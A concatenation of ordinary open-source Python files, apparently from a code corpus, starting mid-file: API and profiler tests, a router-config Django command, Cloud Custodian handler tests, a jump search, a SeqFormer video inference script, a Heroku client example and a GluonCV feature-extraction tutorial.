port_evt = get_fake_port_event()
port_evt.update({'status': ['status', 'SHOULD', 'BE', 'TEXT']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_binding_vnic_type(self):
port_evt = get_fake_port_event()
port_evt.update({'binding:vnic_type': ['binding:vnic_type', 'SHOULD',
'BE', 'TEXT']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_binding_host_id(self):
port_evt = get_fake_port_event()
port_evt.update({'binding:host_id': ['binding:host_id', 'IS',
'NODE_UUID', 'IN', 'IRONIC']})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_events_unsupported_api_version(self):
headers = {api_base.Version.string: '1.50'}
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=headers)
self.assertEqual(http_client.NOT_FOUND, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
@mock.patch.object(auth_token.AuthProtocol, 'process_request',
lambda *_: None)
class TestPostRBAC(TestPost):
"""Test class to execute the Event post tests with RBAC enforcement."""
def setUp(self):
super(TestPostRBAC, self).setUp()
cfg.CONF.set_override('enforce_scope', True, group='oslo_policy')
cfg.CONF.set_override('enforce_new_defaults', True,
group='oslo_policy')
cfg.CONF.set_override('auth_strategy', 'keystone')
# Headers required for this to pass in system scope restricted
# authentication, as our default for api tests is noauth.
self.headers = {
api_base.Version.string: str(
versions.max_version_string()),
'X-Auth-Token': '<PASSWORD>',
'X-Roles': 'admin',
'OpenStack-System-Scope': 'all',
}
|
pypy/module/_lsprof/test/test_cprofile.py | nanjekyejoannah/pypy | 333 | 12739482 |
class AppTestCProfile(object):
spaceconfig = {
"usemodules": ['_lsprof', 'time'],
}
def setup_class(cls):
cls.w_file = cls.space.wrap(__file__)
def test_repr(self):
import _lsprof
assert repr(_lsprof.Profiler) == "<type '_lsprof.Profiler'>"
def test_builtins(self):
import _lsprof
prof = _lsprof.Profiler()
lst = []
prof.enable()
lst.append(len(lst))
prof.disable()
stats = prof.getstats()
expected = (
"<len>",
"<method 'append' of 'list' objects>",
"<method 'disable' of '_lsprof.Profiler' objects>",
)
for entry in stats:
assert entry.code in expected
def test_builtins_callers(self):
import _lsprof
prof = _lsprof.Profiler(subcalls=True)
lst = []
def f1():
lst.append(len(lst))
prof.enable(subcalls=True)
f1()
prof.disable()
stats = prof.getstats()
expected = (
"<len>",
"<method 'append' of 'list' objects>",
)
by_id = set()
for entry in stats:
if entry.code == f1.__code__:
assert len(entry.calls) == 2
for subentry in entry.calls:
assert subentry.code in expected
by_id.add(id(subentry.code))
elif entry.code in expected:
by_id.add(id(entry.code))
# :-( cProfile.py relies on the id() of the strings...
assert len(by_id) == len(expected)
def test_direct(self):
import _lsprof
def getticks():
return len(ticks)
prof = _lsprof.Profiler(getticks, 0.25, True, False)
ticks = []
def bar(m):
ticks.append(1)
if m == 1:
foo(42)
ticks.append(1)
def spam(m):
bar(m)
def foo(n):
bar(n)
ticks.append(1)
bar(n+1)
ticks.append(1)
spam(n+2)
prof.enable()
foo(0)
prof.disable()
assert len(ticks) == 16
stats = prof.getstats()
entries = {}
for entry in stats:
assert hasattr(entry.code, 'co_name')
entries[entry.code.co_name] = entry
efoo = entries['foo']
assert efoo.callcount == 2
assert efoo.reccallcount == 1
assert efoo.inlinetime == 1.0
assert efoo.totaltime == 4.0
assert len(efoo.calls) == 2
ebar = entries['bar']
assert ebar.callcount == 6
assert ebar.reccallcount == 3
assert ebar.inlinetime == 3.0
assert ebar.totaltime == 3.5
assert len(ebar.calls) == 1
espam = entries['spam']
assert espam.callcount == 2
assert espam.reccallcount == 0
assert espam.inlinetime == 0.0
assert espam.totaltime == 1.0
assert len(espam.calls) == 1
foo2spam, foo2bar = efoo.calls
if foo2bar.code.co_name == 'spam':
foo2bar, foo2spam = foo2spam, foo2bar
assert foo2bar.code.co_name == 'bar'
assert foo2bar.callcount == 4
assert foo2bar.reccallcount == 2
assert foo2bar.inlinetime == 2.0
assert foo2bar.totaltime == 3.0
assert foo2spam.code.co_name == 'spam'
assert foo2spam.callcount == 2
assert foo2spam.reccallcount == 0
assert foo2spam.inlinetime == 0.0
assert foo2spam.totaltime == 1.0
bar2foo, = ebar.calls
assert bar2foo.code.co_name == 'foo'
assert bar2foo.callcount == 1
assert bar2foo.reccallcount == 0
assert bar2foo.inlinetime == 0.5
assert bar2foo.totaltime == 2.0
spam2bar, = espam.calls
assert spam2bar.code.co_name == 'bar'
assert spam2bar.callcount == 2
assert spam2bar.reccallcount == 0
assert spam2bar.inlinetime == 1.0
assert spam2bar.totaltime == 1.0
def test_scale_of_result(self):
import _lsprof, time
prof = _lsprof.Profiler()
def foo(n):
t = time.time()
while abs(t - time.time()) < 1.0:
pass # busy-wait for 1 second
def bar(n):
foo(n)
prof.enable()
bar(0)
prof.disable()
stats = prof.getstats()
entries = {}
for entry in stats:
entries[entry.code] = entry
efoo = entries[foo.__code__]
ebar = entries[bar.__code__]
assert 0.9 < efoo.totaltime < 2.9
# --- cannot test .inlinetime, because it does not include
# --- the time spent doing the call to time.time()
#assert 0.9 < efoo.inlinetime < 2.9
for subentry in ebar.calls:
assert 0.9 < subentry.totaltime < 2.9
#assert 0.9 < subentry.inlinetime < 2.9
def test_builtin_exception(self):
import math
import _lsprof
prof = _lsprof.Profiler()
prof.enable()
try:
math.sqrt("a")
except TypeError:
pass
prof.disable()
stats = prof.getstats()
assert len(stats) == 2
|
devices/management/commands/render_configuration.py | maznu/peering-manager | 127 | 12739485 |
from argparse import FileType
from sys import stdin, stdout
from django.core.management.base import BaseCommand
from devices.models import Configuration
from peering.models import Router
class Command(BaseCommand):
help = "Render the configurations of routers."
def add_arguments(self, parser):
parser.add_argument(
"--limit",
nargs="?",
help="Limit the configuration to the given set of routers (comma separated).",
)
parser.add_argument(
"--input",
nargs="?",
type=FileType("r"),
default=stdin,
help="File to read the template from (default to stdin).",
)
parser.add_argument(
"--output",
nargs="?",
type=FileType("w"),
default=stdout,
help="File to write the configuration to (default to stdout).",
)
parser.add_argument(
"--trim",
action="store_true",
help="Remove new line after tag (keep them by default).",
)
parser.add_argument(
"--lstrip",
action="store_true",
help="Strip whitespaces before block (keep them by default).",
)
def handle(self, *args, **options):
if options["verbosity"] >= 2:
self.stdout.write("[*] Loading template")
t = Configuration(
name="tmp",
template=options["input"].read(),
jinja2_trim=options["trim"],
jinja2_lstrip=options["lstrip"],
)
routers = Router.objects.all()
if options["limit"]:
routers = routers.filter(hostname__in=options["limit"].split(","))
self.stdout.write("[*] Rendering configurations")
for r in routers:
if options["verbosity"] >= 2:
self.stdout.write(f" - Rendering {r.hostname} configuration")
r.configuration_template = t
configuration = r.generate_configuration()
self.stdout.write(configuration)
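# Illustrative invocation sketch (not part of the original command; the router
# hostnames and file paths below are assumptions):
#
#   python manage.py render_configuration \
#       --limit router1.example.net,router2.example.net \
#       --input templates/base.j2 --output /tmp/rendered.conf --trim --lstrip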
|
tests/test_handler.py | al3pht/cloud-custodian | 2,415 | 12739537 | # Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import json
import logging
import mock
import os
from .common import BaseTest
from c7n.exceptions import PolicyExecutionError
from c7n.policy import Policy
from c7n import handler
class HandleTest(BaseTest):
def test_init_config_exec_option_merge(self):
policy_config = {
'execution-options': {
'region': 'us-east-1',
'assume_role': 'arn:::',
'profile': 'dev',
'tracer': 'xray',
'account_id': '004',
'dryrun': True,
'cache': '/foobar.cache'},
'policies': [
{'mode': {
'type': 'period',
'schedule': "rate(1 minute)",
'execution-options': {
'metrics_enabled': True,
'assume_role': 'arn::::007:foo',
'output_dir': 's3://mybucket/output'}},
'resource': 'aws.ec2',
'name': 'check-dev'}
]}
self.assertEqual(
dict(handler.init_config(policy_config)),
{'assume_role': 'arn::::007:foo',
'metrics_enabled': 'aws',
'tracer': 'xray',
'account_id': '007',
'region': 'us-east-1',
'output_dir': 's3://mybucket/output',
# defaults
'external_id': None,
'dryrun': False,
'profile': None,
'authorization_file': None,
'cache': '',
'regions': (),
'cache_period': 0,
'log_group': None,
'metrics': None})
def setupLambdaEnv(
self, policy_data, environment=None, err_execs=(),
log_level=logging.INFO):
work_dir = self.change_cwd()
self.patch(handler, 'policy_data', None)
self.patch(handler, 'policy_config', None)
# don't require api creds to resolve account id
if 'execution-options' not in policy_data:
policy_data['execution-options'] = {'account_id': '007'}
elif 'account_id' not in policy_data['execution-options']:
policy_data['execution-options']['account_id'] = '007'
with open(os.path.join(work_dir, 'config.json'), 'w') as fh:
json.dump(policy_data, fh, indent=2)
output = self.capture_logging('custodian.lambda', level=log_level)
if environment:
self.change_environment(**environment)
policy_execution = []
validation_called = []
def validate(self):
validation_called.append(True)
def push(self, event, context):
policy_execution.append((event, context))
if err_execs:
raise err_execs.pop(0)
self.patch(Policy, "push", push)
self.patch(Policy, "validate", validate)
return output, policy_execution
def test_dispatch_log_event(self):
output, executions = self.setupLambdaEnv(
{'policies': [{'name': 'ec2', 'resource': 'ec2'}]},
{'C7N_DEBUG_EVENT': None},
log_level=logging.DEBUG)
handler.dispatch_event({'detail': {'resource': 'xyz'}}, {})
self.assertTrue('xyz' in output.getvalue())
self.patch(handler, 'C7N_DEBUG_EVENT', False)
handler.dispatch_event({'detail': {'resource': 'abc'}}, {})
self.assertFalse('abc' in output.getvalue())
self.assertTrue(executions)
@mock.patch('c7n.handler.PolicyCollection')
def test_dispatch_err_event(self, mock_collection):
output, executions = self.setupLambdaEnv({
'execution-options': {
'output_dir': 's3://xyz',
'account_id': '004'},
'policies': [{'resource': 'ec2', 'name': 'xyz'}]},
log_level=logging.DEBUG)
mock_collection.from_data.return_value = []
handler.dispatch_event({'detail': {'errorCode': 'unauthorized'}}, None)
self.assertTrue('Skipping failed operation: unauthorized' in output.getvalue())
self.patch(handler, 'C7N_SKIP_EVTERR', False)
handler.dispatch_event({'detail': {'errorCode': 'foi'}}, None)
self.assertFalse('Skipping failed operation: foi' in output.getvalue())
mock_collection.from_data.assert_called_once()
def test_dispatch_err_handle(self):
output, executions = self.setupLambdaEnv({
'execution-options': {'output_dir': 's3://xyz', 'account_id': '004'},
'policies': [{'resource': 'ec2', 'name': 'xyz'}]},
err_execs=[PolicyExecutionError("foo")] * 2)
self.assertRaises(
PolicyExecutionError,
handler.dispatch_event,
{'detail': {'xyz': 'oui'}}, None)
self.patch(handler, 'C7N_CATCH_ERR', True)
handler.dispatch_event({'detail': {'xyz': 'oui'}}, None)
self.assertEqual(output.getvalue().count('error during'), 2)
def test_handler(self):
output, executions = self.setupLambdaEnv({
'policies': [{
'resource': 'asg', 'name': 'auto'}]},
)
self.assertEqual(
handler.dispatch_event({"detail": {"errorCode": "404"}}, None), None
)
self.assertEqual(handler.dispatch_event({"detail": {}}, None), True)
self.assertEqual(executions, [({"detail": {}, "debug": True}, None)])
|
algorithms/Python/searching/jump_search.py | Tanmoy07tech/DSA | 247 | 12739545 | """
Jump search algorithm iterates through a sorted list with a step of n^(1/2),
until the element compared is bigger than the one searched.If the item is not
in the particular step, it shifts the entire step.
It will then perform a linear search on the step until it matches the target.
If not found, it returns -1.
Time Complexity: O(√n)
Space Complexity: O(1)
"""
import math
arr = [0, 1, 2, 8, 13, 17, 19, 25, 31, 32, 42]
target = 25
def jump_search(arr: list, x: int) -> int:
"""
>>> jump_search(arr, target) == (arr.index(target) if target in arr else -1)
True
"""
n = len(arr)
step = int(math.floor(math.sqrt(n)))
prev = 0
while arr[min(step, n) - 1] < x:
prev = step
step += int(math.floor(math.sqrt(n)))
if prev >= n:
return -1
while arr[prev] < x:
prev = prev + 1
if prev == min(step, n):
return -1
if arr[prev] == x:
return prev
return -1
def check_sort(test: list) -> bool:
    """checks whether the given list is sorted or not."""
    return sorted(test) == test
if __name__ == "__main__":
if check_sort(arr):
res = jump_search(arr, target)
if res == -1:
print("Number not found!")
else:
print(f"Number {target} is at index {res}")
else:
print("Given list is not sorted!")
|
inference.py | OmkarThawakar/SeqFormer-1 | 223 | 12739582 |
'''
Inference code for SeqFormer
'''
import argparse
import datetime
import json
import random
import time
from pathlib import Path
import numpy as np
import torch
import datasets
import util.misc as utils
from models import build_model
import torchvision.transforms as T
import matplotlib.pyplot as plt
import os
from PIL import Image
import math
import torch.nn.functional as F
import json
import pycocotools.mask as mask_util
import sys
import cv2
def get_args_parser():
parser = argparse.ArgumentParser('Set transformer detector', add_help=False)
parser.add_argument('--lr', default=1e-4, type=float)
parser.add_argument('--lr_backbone', default=1e-5, type=float)
parser.add_argument('--batch_size', default=2, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument('--epochs', default=150, type=int)
parser.add_argument('--lr_drop', default=100, type=int)
parser.add_argument('--clip_max_norm', default=0.1, type=float,
help='gradient clipping max norm')
parser.add_argument('--with_box_refine', default=True, action='store_true')
# Model parameters
parser.add_argument('--model_path', type=str, default=None,
help="Path to the model weights.")
# * Backbone
parser.add_argument('--backbone', default='resnet50', type=str,
help="Name of the convolutional backbone to use")
parser.add_argument('--dilation', action='store_true',
help="If true, we replace stride with dilation in the last convolutional block (DC5)")
parser.add_argument('--position_embedding', default='sine', type=str, choices=('sine', 'learned'),
help="Type of positional embedding to use on top of the image features")
parser.add_argument('--position_embedding_scale', default=2 * np.pi, type=float,
help="position / size * scale")
parser.add_argument('--num_feature_levels', default=4, type=int, help='number of feature levels')
# * Transformer
parser.add_argument('--enc_layers', default=6, type=int,
help="Number of encoding layers in the transformer")
parser.add_argument('--dec_layers', default=6, type=int,
help="Number of decoding layers in the transformer")
parser.add_argument('--dim_feedforward', default=1024, type=int,
help="Intermediate size of the feedforward layers in the transformer blocks")
parser.add_argument('--hidden_dim', default=256, type=int,
help="Size of the embeddings (dimension of the transformer)")
parser.add_argument('--dropout', default=0.1, type=float,
help="Dropout applied in the transformer")
parser.add_argument('--nheads', default=8, type=int,
help="Number of attention heads inside the transformer's attentions")
parser.add_argument('--num_queries', default=300, type=int,
help="Number of query slots")
parser.add_argument('--dec_n_points', default=4, type=int)
parser.add_argument('--enc_n_points', default=4, type=int)
parser.add_argument('--rel_coord', default=True, action='store_true')
# Segmentation
parser.add_argument('--masks', action='store_true',
help="Train segmentation head if the flag is provided")
parser.add_argument('--mask_out_stride', default=4, type=int)
# Loss
parser.add_argument('--no_aux_loss', dest='aux_loss', action='store_false',
help="Disables auxiliary decoding losses (loss at each layer)")
# * Matcher
parser.add_argument('--set_cost_class', default=1, type=float,
help="Class coefficient in the matching cost")
parser.add_argument('--set_cost_bbox', default=5, type=float,
help="L1 box coefficient in the matching cost")
parser.add_argument('--set_cost_giou', default=2, type=float,
help="giou box coefficient in the matching cost")
# * Loss coefficients
parser.add_argument('--mask_loss_coef', default=2, type=float)
parser.add_argument('--dice_loss_coef', default=5, type=float)
parser.add_argument('--cls_loss_coef', default=2, type=float)
parser.add_argument('--bbox_loss_coef', default=5, type=float)
parser.add_argument('--giou_loss_coef', default=2, type=float)
parser.add_argument('--focal_alpha', default=0.25, type=float)
# dataset parameters
parser.add_argument('--img_path', default='../ytvis/val/JPEGImages/')
parser.add_argument('--ann_path', default='../ytvis/annotations/instances_val_sub.json')
parser.add_argument('--save_path', default='results.json')
parser.add_argument('--dataset_file', default='YoutubeVIS')
parser.add_argument('--coco_path', type=str)
parser.add_argument('--coco_panoptic_path', type=str)
parser.add_argument('--remove_difficult', action='store_true')
parser.add_argument('--output_dir', default='output_ytvos',
help='path where to save, empty for no saving')
parser.add_argument('--device', default='cuda',
help='device to use for training / testing')
parser.add_argument('--seed', default=42, type=int)
parser.add_argument('--resume', default='', help='resume from checkpoint')
parser.add_argument('--start_epoch', default=0, type=int, metavar='N',
help='start epoch')
#parser.add_argument('--eval', action='store_true')
parser.add_argument('--eval', action='store_false')
parser.add_argument('--num_workers', default=0, type=int)
parser.add_argument('--num_frames', default=1, type=int, help='number of frames')
# distributed training parameters
parser.add_argument('--world_size', default=1, type=int,
help='number of distributed processes')
parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training')
return parser
CLASSES=['person','giant_panda','lizard','parrot','skateboard','sedan','ape',
'dog','snake','monkey','hand','rabbit','duck','cat','cow','fish',
'train','horse','turtle','bear','motorbike','giraffe','leopard',
'fox','deer','owl','surfboard','airplane','truck','zebra','tiger',
'elephant','snowboard','boat','shark','mouse','frog','eagle','earless_seal',
'tennis_racket']
transform = T.Compose([
T.Resize(360),
T.ToTensor(),
T.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
def main(args):
device = torch.device(args.device)
# fix the seed for reproducibility
seed = args.seed + utils.get_rank()
torch.manual_seed(seed)
np.random.seed(seed)
random.seed(seed)
with torch.no_grad():
model, criterion, postprocessors = build_model(args)
model.to(device)
state_dict = torch.load(args.model_path)['model']
model.load_state_dict(state_dict)
model.eval()
folder = args.img_path
videos = json.load(open(args.ann_path,'rb'))['videos']#[:5]
# videos = [videos[1],videos[8],videos[22],videos[34]]
vis_num = len(videos)
# postprocess = PostProcessSegm_ifc()
result = []
for i in range(vis_num):
print("Process video: ",i)
id_ = videos[i]['id']
vid_len = videos[i]['length']
file_names = videos[i]['file_names']
video_name_len = 10
pred_masks = None
pred_logits = None
img_set=[]
for k in range(vid_len):
im = Image.open(os.path.join(folder,file_names[k]))
w, h = im.size
sizes = torch.as_tensor([int(h), int(w)])
img_set.append(transform(im).unsqueeze(0).cuda())
img = torch.cat(img_set,0)
model.detr.num_frames=vid_len
outputs = model.inference(img,img.shape[-1],img.shape[-2])
logits = outputs['pred_logits'][0]
output_mask = outputs['pred_masks'][0]
output_boxes = outputs['pred_boxes'][0]
H = output_mask.shape[-2]
W = output_mask.shape[-1]
scores = logits.sigmoid().cpu().detach().numpy()
hit_dict={}
topkv, indices10 = torch.topk(logits.sigmoid().cpu().detach().flatten(0),k=10)
indices10 = indices10.tolist()
for idx in indices10:
queryid = idx//42
if queryid in hit_dict.keys():
hit_dict[queryid].append(idx%42)
else:
hit_dict[queryid]= [idx%42]
for inst_id in hit_dict.keys():
masks = output_mask[inst_id]
pred_masks =F.interpolate(masks[:,None,:,:], (im.size[1],im.size[0]),mode="bilinear")
pred_masks = pred_masks.sigmoid().cpu().detach().numpy()>0.5 #shape [100, 36, 720, 1280]
if pred_masks.max()==0:
print('skip')
continue
for class_id in hit_dict[inst_id]:
category_id = class_id
score = scores[inst_id,class_id]
# print('name:',CLASSES[category_id-1],', score',score)
instance = {'video_id':id_, 'video_name': file_names[0][:video_name_len], 'score': float(score), 'category_id': int(category_id)}
segmentation = []
for n in range(vid_len):
if score < 0.001:
segmentation.append(None)
else:
mask = (pred_masks[n,0]).astype(np.uint8)
rle = mask_util.encode(np.array(mask[:,:,np.newaxis], order='F'))[0]
rle["counts"] = rle["counts"].decode("utf-8")
segmentation.append(rle)
instance['segmentations'] = segmentation
result.append(instance)
with open(args.save_path, 'w', encoding='utf-8') as f:
json.dump(result,f)
if __name__ == '__main__':
parser = argparse.ArgumentParser(' inference script', parents=[get_args_parser()])
args = parser.parse_args()
main(args)
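# Illustrative invocation sketch (not part of the original script; the checkpoint
# path below is an assumption):
#
#   python inference.py --masks --backbone resnet50 \
#       --model_path weights/seqformer_checkpoint.pth \
#       --img_path ../ytvis/val/JPEGImages/ \
#       --ann_path ../ytvis/annotations/instances_val_sub.json \
#       --save_path results.json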
|
gabbi/tests/test_replacers.py | scottwallacesh/gabbi | 145 | 12739615 | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A place to put test of the replacers.
"""
import os
import unittest
from gabbi import case
from gabbi import exception
class EnvironReplaceTest(unittest.TestCase):
def test_environ_boolean(self):
"""Environment variables are always strings
That doesn't always suit our purposes, so test that "True"
and "False" become booleans as a special case.
"""
http_case = case.HTTPTestCase('test_request')
message = "$ENVIRON['moo']"
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "False"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "true"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "faLse"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "null"
self.assertEqual(None, http_case._environ_replace(message))
os.environ['moo'] = "1"
self.assertEqual(1, http_case._environ_replace(message))
os.environ['moo'] = "cow"
self.assertEqual("cow", http_case._environ_replace(message))
message = '$ENVIRON["moo"]'
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
class TestReplaceHeaders(unittest.TestCase):
def test_empty_headers(self):
"""A None value in headers should cause a GabbiFormatError."""
http_case = case.HTTPTestCase('test_request')
self.assertRaises(
exception.GabbiFormatError,
http_case._replace_headers_template, 'foo', None)
|
examples/basic_functionality.py | AkBotZ/heroku3.py | 109 | 12739638 | # coding=utf-8
import os
from pprint import pprint # noqa
# Third party libraries
import heroku3
# import socket
# import httplib
# import logging
# httplib.HTTPConnection.debuglevel = 1
# logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from requests
# logging.getLogger().setLevel(logging.INFO)
# requests_log = logging.getLogger("requests.packages.urllib3")
# requests_log.setLevel(logging.INFO)
# requests_log.propagate = True
HEROKU_API_KEY = os.environ.get("HEROKU_API_KEY", False)
HEROKU_APPNAME = os.environ.get("HEROKU_APPNAME", False)
TEST_EMAIL = os.environ.get("TEST_EMAIL", False)
heroku_conn = heroku3.from_key(HEROKU_API_KEY)
# app = heroku_conn.create_app(name='testy2124app', stack_id_or_name='cedar', region_id_or_name='us')
# print(app.addons())
# print(heroku_conn.addons('testy123app'))
# for addon in app.addons():
# addon.delete()
# del config['TEST1']
# del config['TEST2']
# del config['TEST3']
# del config['Z01']
# del config['Z02']
# print(config)
# config['TEST1'] = u'MM1'
# config['TEST2'] = u'MM2'
# config['TEST3'] = u'MM3'
# config2 = heroku_conn.update_appconfig('testy123app', {u'Z01': u'A1', u'Z02': u'A2'})
# config2 = config.update({u'Z01': u'A1', u'Z02': u'A2'})
# config3 = app.config()
# print(config)
# print("======")
# print(config2)
# print("======")
# print(config3)
# print(config['TEST1'])
# print(config['TEST3'])
# app = heroku_conn.app('kdsjhkszdjhgksjdhfkj')
# procs = app.process_formation()
# proc = app.process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# print(procs)
# proc.scale(0)
# app.scale_formation_process('web', 1)
# output = app.run_command('pgbackups:url')
# collab = app.add_collaborator(email=TEST_EMAIL, silent=False)
# collab = app.remove_collaborator(TEST_EMAIL)
# print(newapp.collaborators())
# config = newapp.config()
# config['TEST2'] = None
# print(newapp.domains())
# domain2 = newapp.add_domain('testy123.testing.com')
# print(newapp.domains())
# newapp.remove_domain('testy123.testing.com')
# domain.remove()
# print(newapp.domains())
# app = heroku_conn.app(HEROKU_APPNAME)
# pprint(app.addons())
# dynos = app.dynos()
# dyno = dynos['web.1']
# print(dyno)
# releases = app.releases(sort='asc')
# for release in releases:
# print("{0} {1} {2} {3}".format(release.id, release.commit, release.user, release.description))
# releases = app.releases()._items.reverse()
# print(releases.pop())
# print(releases.pop())
# app.rollback('v108')
# apps = heroku_conn.apps(order_by='name', limit=1, sort='asc')
# apps = heroku_conn.apps(order_by='name', limit=1)
apps = heroku_conn.apps(order_by="name", sort="asc")
for app in apps:
print(app.name)
# app.rename('testy223')
# print(app.enable_maintenance_mode())
# print(app.disable_maintenance_mode())
# app.enable_feature('user-env-compile')
# app.disable_feature('user-env-compile')
# print(app.labs())
# print(heroku_conn.features())
# domain = app.add_domain('test123-1.testing.com')
# domain = app.add_domain('test123-2.testing.com')
# domain = app.add_domain('test123-3.testing.com')
# domain = app.add_domain('test123-4.testing.com')
# domain = app.add_domain('test123-5.testing.com')
# domain = app.add_domain('test123-6.testing.com')
# domain = app.add_domain('test123-7.testing.com')
# iterator = app.stream_log(lines=1)
# for line in iterator:
# filter out keep-alive new lines
# if line:
# print("{0}".format(line))
# logs = app.get_log(lines=100)
# print(logs)
# print(app.domains(limit=1))
# dyno = app.run_command('fab -l', printout=True)
# dyno.remove()
# proc = heroku_conn.apps()['testy123app'].process_formation()['web']
# print(proc.size)
# print(proc.quantity)
# formations = app.process_formation()
# print(formations['web'])
# for formation in formations:
# formation.resize(1)
# print(app._h._last_request_id)
# print(app.dynos()['web.1'])
# print(dynos['web.1'])
# print(heroku_conn.apps()['testy123app'])
# print(heroku_conn.apps()['d32b74d8-f5cf-4e3e-95dd-a601668fdb0c'])
# for dyno in app.dynos():
# print(dyno)
# print(dyno.command)
# dyno.restart()
# app.restart()
# del config['TEST2']
# newapp.remove_collaborator('<EMAIL>')
# collab.remove()
# pprint(newapp.addons)
# app = heroku_conn.app('testy123app')
# for addon in app.addons:
# print(addon.app.name, " - ", addon.plan.name)
# addons = heroku_conn.addon_services()
# pprint(addons)
# pg_addon = heroku_conn.addon_services('6235c964-8b3c-47e0-952f-8d8f6a2d53f5')
# pg_addon = heroku_conn.addon_services(id_or_name='heroku-postgresql')
# pprint(pg_addon)
# for addon in addons:
# print(addon.name, " - ", addon.id, " - ", addon.id, " - ", addon.price)
# addon.upgrade(plan_id_or_name='heroku-postgresql:basic')
# addon.delete()
# buildpack_urls = [
# 'https://github.com/some/buildpack', 'https://github.com/another/buildpack'
# ]
# app.update_buildpacks([buildpack_urls])
# buildpack_urls can also be empty. This clears all buildpacks:
# app.update_buildpacks([])
# app.delete()
print(heroku_conn._last_request_id)
|
docs/tutorials_torch/action_recognition/extract_feat.py | Kh4L/gluon-cv | 5,447 | 12739641 | """3. Extracting video features from pre-trained models
=======================================================
Feature extraction is a very useful tool when you don't have a large annotated dataset or don't have the
computing resources to train a model from scratch for your use case. It's also useful for visualizing what the model has learned.
In this tutorial, we provide a simple unified solution.
The only thing you need to prepare is a text file containing the information of your videos (e.g., the path to your videos);
we will take care of the rest.
You can extract strong video features from many popular pre-trained models in the GluonCV video model zoo using a single command line.
.. note::
    Feel free to skip the tutorial because the feature extraction script is self-contained and ready to launch.
:download:`Download Full Python Script: feat_extract_pytorch.py<../../../scripts/action-recognition/feat_extract_pytorch.py>`
Please check out the `model_zoo <../model_zoo/index.html#action_recognition>`_ to select your preferred pretrained model.
``python feat_extract_pytorch.py --config-file CONFIG``
"""
######################################################################
# Prepare Data
# ------------
#
# Your data can be stored in any hierarchy.
# Just use the format we adopt for training models in the previous tutorial and save the data annotation file as ``video.txt``.
# ::
#
# /home/ubuntu/your_data/video_001.mp4 200 0
# /home/ubuntu/your_data/video_001.mp4 300 1
# /home/ubuntu/your_data/video_002.mp4 100 2
# /home/ubuntu/your_data/video_003.mp4 400 2
# /home/ubuntu/your_data/video_004.mp4 200 1
# ......
# /home/ubuntu/your_data/video_100.mp4 100 3
#
# Each line has three fields: the path to the video, the number of video frames and the video label.
# However, the second and third fields are not actually used by the code; they are just placeholders.
# So you can put any positive number in these two places.
#
# Note that, at this moment, we only support extracting features from videos directly.
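######################################################################
# If all of your videos live in a single folder, a short helper script can
# generate ``video.txt`` for you. The snippet below is only a sketch: the
# folder ``/home/ubuntu/your_data`` is an assumed location, and the frame
# count (``300``) and label (``0``) are placeholders, which is fine because
# the extraction script ignores those two fields.
import os
video_dir = '/home/ubuntu/your_data'  # assumed location of your videos
if os.path.isdir(video_dir):
    with open('video.txt', 'w') as f:
        for name in sorted(os.listdir(video_dir)):
            if name.endswith(('.mp4', '.avi')):
                # placeholder frame count and label; any positive numbers work
                f.write('%s 300 0\n' % os.path.join(video_dir, name))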
######################################################################
# Once you prepare the ``video.txt``, you can start extracting features by:
#
# ::
#
# python feat_extract_pytorch.py --config-file ./scripts/action-recognition/configuration/i3d_resnet50_v1_feat.yaml
######################################################################
# The extracted features will be saved to a directory defined in the config file. Each video will have one feature file.
# For example, ``video_001.mp4`` will have a feature named ``i3d_resnet50_v1_kinetics400_video_001_feat.npy``.
# The feature is extracted from the center of the video by using a 32-frames clip.
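######################################################################
# Once extraction finishes, each saved ``.npy`` file can be read back with
# NumPy. The file name below simply follows the naming pattern described
# above and is an assumption; point it at your configured output directory.
import os
import numpy as np
feat_file = 'i3d_resnet50_v1_kinetics400_video_001_feat.npy'
if os.path.exists(feat_file):
    feat = np.load(feat_file)
    print('feature shape:', feat.shape)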
######################################################################
# There are many other options and other models you can choose,
# e.g., `resnet50_v1b_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/resnet50_v1b_feat.yaml>`_,
# `slowfast_4x16_resnet50_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/slowfast_4x16_resnet50_feat.yaml>`_,
# `tpn_resnet50_f32s2_feat.yaml <https://raw.githubusercontent.com/dmlc/gluon-cv/master/scripts/action-recognition/configuration/tpn_resnet50_f32s2_feat.yaml>`_,
